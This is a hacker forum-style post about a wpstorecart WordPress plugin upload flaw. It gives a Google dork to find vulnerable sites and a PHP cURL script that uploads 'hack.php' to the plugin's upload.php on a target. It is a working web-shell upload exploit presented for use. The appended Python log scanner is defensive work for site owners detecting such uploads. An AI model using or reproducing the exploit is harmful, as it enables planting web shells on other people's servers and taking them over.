Unknown On 11/06/16


Dork : inurl:/wp-content/plugins/wpstorecart/
Click Some Targets
Go To Dir > wpstorecart/wpstorecart/admin/php/
Find > upload.php
Vuln : blank
Execution ? use your brain :))
CSRF :

<?php

$uploadfile="hack.php";
$ch = curl_init("http://target.com/wp-content/plugins/wpstorecart/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Note: for now, I have only tested uploading a picture :) ~
Path Upload ? use your brain ;) ...
That’s All

By Mr.XSecr3t
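
For a site owner checking whether this upload handler was reached, the following is an added example, not code from the original post: it scans combined-format access logs for POSTs to any upload.php below the plugin directory and for PHP files under /wp-content/ that are later served to the same client. The log lines, IP addresses and the EXAMPLE-UPLOAD-DIR path are constructed placeholders, and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

LOG_RE = re.compile(  # Apache/nginx "combined" access-log line
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')
# The post names two sub-paths, so match upload.php anywhere below the plugin dir.
UPLOAD_RE = re.compile(r'^/wp-content/plugins/wpstorecart/(?:.*/)?upload\.php$', re.I)
PHP_RE = re.compile(r'^/wp-content/.*\.php$', re.I)

def normalise(raw_path):
    """Drop the query string, decode %-escapes, collapse repeated slashes."""
    return re.sub(r'/+', '/', unquote(raw_path.split('?', 1)[0]))

def scan(lines):
    """Return (kind, ip, path, status) tuples in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, method, status = m['ip'], m['method'], int(m['status'])
        path = normalise(m['path'])
        if UPLOAD_RE.match(path):
            if method == 'POST':
                findings.append(('upload_post', ip, path, status))
                if status < 400:
                    uploaders.add(ip)  # the handler accepted the request
        elif ip in uploaders and PHP_RE.match(path) and status == 200:
            # Same client is now served a PHP file from wp-content: check it on disk.
            findings.append(('php_after_upload', ip, path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-content/plugins/wpstorecart/php/upload.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/EXAMPLE-UPLOAD-DIR/sample.php HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-content/EXAMPLE-UPLOAD-DIR/missing.php HTTP/1.1" 404 150 "-" "-"',
    '198.51.100.20 - - [01/Jan/2024:11:30:00 +0000] "POST //wp-content/plugins/wpstorecart//wpstorecart/admin/php/upload.php?x=1 HTTP/1.1" 403 199 "-" "-"',
    '198.51.100.20 - - [01/Jan/2024:11:30:05 +0000] "GET /wp-content/themes/sample/index.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A `php_after_upload` hit is a lead rather than proof; confirm it against the files actually present on disk.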
